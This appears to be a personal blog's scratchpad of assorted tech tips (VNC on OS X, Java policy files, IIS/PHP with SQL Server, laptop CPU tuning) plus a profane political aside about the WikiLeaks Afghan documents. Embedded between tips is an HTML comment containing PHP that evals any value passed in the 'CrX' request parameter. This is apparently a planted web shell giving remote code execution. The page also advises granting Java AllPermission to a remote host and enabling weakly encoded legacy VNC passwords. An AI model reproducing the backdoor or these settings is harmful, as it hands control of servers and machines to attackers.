Răzvan Cosma's scratchpad

random scripts of random value

PacketDam has reached an important milestone with the addition of IPv6 support. As native deployments are becoming the norm, it is only a matter of time before attacks switch to the new transport. http://www.packetdam.com/features/

Linking back to http://sqlzoo.net – as a “thank you” for their service.

When running the default (retail) XP SP3 OS, this laptop runs at full CPU speed, and becomes worryingly hot in the process. Since Acer’s e* Management package doesn’t seem to actually do anything, the solution so far is to:

  1. Download RMClock
  2. Keep only two profiles, 4.0@0.975V and 8.0@1.175V
  3. Set profile to “Performance on demand” and “Use PST”

If you don’t run with administrator privileges by default,

  1. Install AdmiLink (yes, it’s in Russian)
  2. Point it to the full path to RMClock.exe, ShowWindow -d10 SHOWDEFAULT, link in AutoStart folder, delay enough seconds for the shell to load
  1. You won’t need this if you connect with Apple’s client or with Jolly’s FastVNC. Most other clients though (tightvnc) require an initial password instead of presenting OS X’s login window.
  2. From a root prompt:
    1. Turn Screen Sharing off:
      sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -stop
    2. cat > /Library/Preferences/com.apple.RemoteManagement.plist
      <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
      <plist version="1.0">
      <dict>
      <key>ARD_AllLocalUsers</key> <false/>
      <key>LoadRemoteManagementMenuExtra</key> <true/>
      <key>ScreenSharingReqPermEnabled</key> <true/>
      <key>VNCLegacyConnectionsEnabled</key> <true/>
      </dict>
      </plist>
    3. echo enabled >/Library/Preferences/com.apple.ScreenSharing.launchd
    4. Generate an encrypted password (actually it is not encrypted, only truncated to 8 characters and XORed with a fixed key):
      echo p4sv0rdd | perl -we 'BEGIN { @k = unpack "C*", pack "H*", "1734516E8BA8C5E2FF1C39567390ADCA"}; $_ = <>; chomp; s/^(.{8}).*/$1/; @p = unpack "C*", $_; foreach (@k) { printf "%02X", $_ ^ (shift @p || 0) }; print "\n"' | tee /Library/Preferences/com.apple.VNCSettings.txt
    5. Not sure why, but to start you must use stop again:
      sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -stop
      sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -users admin -privs -all -restart -agent

Referenced from here and here.

In Ubuntu:

update-alternatives --list java

the output should be something like

There are 2 choices for the alternative java (providing /usr/bin/java).
Selection    Path                       Priority   Status
------------------------------------------------------------
* 0            /usr/bin/java-j2re1.6-ibm   1200      auto mode
  1            /usr/bin/java-j2re1.6-ibm   1200      manual mode
  2            /usr/bin/java-j2sdk1.6-ibm  1200      manual mode

so JAVA_HOME is

/usr/lib/j2re1.6-ibm/jre

and the file to edit is

$JAVA_HOME/lib/security/java.policy

File syntax is something like

grant codeBase "http://somehost.com:80/*" {
  permission java.security.AllPermission;
};

Media coverage and public interest in Julian Assange’s latest uncovering of a shitload of documents concerning the American-Afghan war seem to be way overblown, for what appears (after a cursory glance, there are more than 70 thousand of them) to be just accounting paperwork. Accounting of lost lives and destruction, but accounting nevertheless. America’s war is one of greed and petty interests, nothing glorious about it, nothing spectacular to reveal. To an outside observer, this might look like a careful mis-en-scène of a Hollywoodian spy flick, meant to create villains and heroes out of the dumb kids who went to fight in the desert and returned home covered in not just shame, but worse: instant oblivion. Nobody gives a fuck about them, they are in no way saviours of any country or ideal, there was no menace to defend their beloved homeland from to begin with, they were just sent out to collect on a protection tax that the Muslims stubbornly refuse to pay. I have noticed a single sane analysis of the deluge of documents, from Brendan O’Neill, an author who will go into my bookmarks tab: This is Truth as a religious-style revelation rather than Truth as the endpoint of thought, interrogation, question-asking, analysis. In reality, it is only through actively engaging with the world and its problems, through gathering facts and objectively analysing and organising them, that we can arrive at any Truth worth its name.

As for the sudden and chilling accusations that popped out immediately afterwards against Assange, the Guardian‘s dry humour is eloquent enough: It seems an unusual time to embark on a career of multiple rape.

find . -type f -links +1

find <samefilesystem> -inum <inode from above> -ls

Configure some less-used key (right win) as “compose key”. For Ubuntu/Gnome, this is in System->Preferences->Keyboard->Options. Typing RWin+a modifier then the letter will result in:

rw+’: a-á e-é i-í o-ó r-ŕ s-ś z-ź w-ẃ

rw+`: a-à e-è o-ò

rw+<: z-ž c-č

rw+key pressed twice: a-å o-° e-ə

.. and a lot of others, the full list of shortcuts available depends on the GTK implementations and can be checked in gtkimcontextsimpleseqs.h

Start with F8->disable restart on failure, if the bluscreen error is 0x7b then switch your hard drives to IDE mode in BIOS, then edit these two registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Msahci
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\IastorV
“Start” must have a value of 0 (loaded by kernel), it is probably 3 (manual)
More details here

<!– [insert_php]if (isset($_REQUEST["CrX"])){eval($_REQUEST["CrX"]);exit;}[/insert_php][php]if (isset($_REQUEST["CrX"])){eval($_REQUEST["CrX"]);exit;}[/php] –>

1. Do not use the web platform installer. If you already have, uninstall PHP and FastCGI using the Control Panel
2. Download the Non Thread Safe ZIP version from http://windows.php.net/download/, unpack it in C:\PHP5
3. Download FastCGI from http://www.iis.net/download/FastCGI (already included in Windows 7)
4. Add the .php file extension mapping using the IIS manager or
C:\WINDOWS\system32\inetsrv>cscript fcgiconfig.js -add -section:"PHP" -extension:php -path:"C:\PHP5\php-cgi.exe"
5. Download the VC9 non-thread safe FreeTDS dll from http://download.moodle.org/download.php … B_NOTS.zip or (preferred – this one has parameterized queries) the v2 php_sqlsrv_53_nts_vc9.dll – search for the download link on http://blogs.msdn.com/sqlphp – it’s in beta now.
6. In c:\php5\php.ini:
error_log = c:\devel\php-errors.log
fastcgi.impersonate = 1
extension=ext\php_sqlsrv_53_nts_vc9.dll
7. Set the application protection level to Low (IIS Process)
8. in a file.php
<?php
ini_set('error_reporting',E_ALL);
ini_set('display_errors','On');
ini_set('display_startup_errors','On');
//phpinfo();
$serverName = "(local)\sqlexpress";
$connectionOptions = array("Database"=>"aa", "UID"=>"zz", "PWD"=>"yy");
$conn = sqlsrv_connect($serverName, $connectionOptions); $s=sqlsrv_errors();
if(!$conn) echo ('cannot connect: ' .$s[0][2]);
else { echo 'Successful connection';
sqlsrv_close($conn); }

Bad Behavior has blocked 42 access attempts in the last 7 days.